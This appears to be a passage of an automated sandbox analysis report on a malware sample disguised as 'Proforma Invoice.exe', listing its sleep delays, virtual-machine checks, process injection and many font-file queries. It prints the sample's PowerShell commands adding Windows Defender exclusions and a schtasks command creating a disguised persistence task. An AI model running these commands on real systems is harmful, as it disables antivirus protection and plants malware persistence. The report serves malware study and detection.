Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99434
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99218
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99104
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99000
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98778
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98562
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98452
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98343
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98234
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98125
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 98015
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97906
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97796
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97687
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97578
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97468
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97359
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97250
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97140
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 97030
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 96921
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 96812
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 96703
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 96593
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199879
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199754
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199629
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199504
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199379
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199254
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199129
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199004
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198879
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198754
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198629
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198504
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198379
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198254
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198129
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198004
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1197879

Source: VoAlKljQu.exe, 0000000D.00000002.4090730561.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: Proforma Invoice.exe, 00000000.00000002.1683476539.000000000077D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
Source: Proforma Invoice.exe, 00000008.00000002.4091170489.000000000149B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory written: C:\Users\user\Desktop\Proforma Invoice.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory written: C:\Users\user\AppData\Roaming\VoAlKljQu.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Proforma Invoice.exe	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp3C70.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
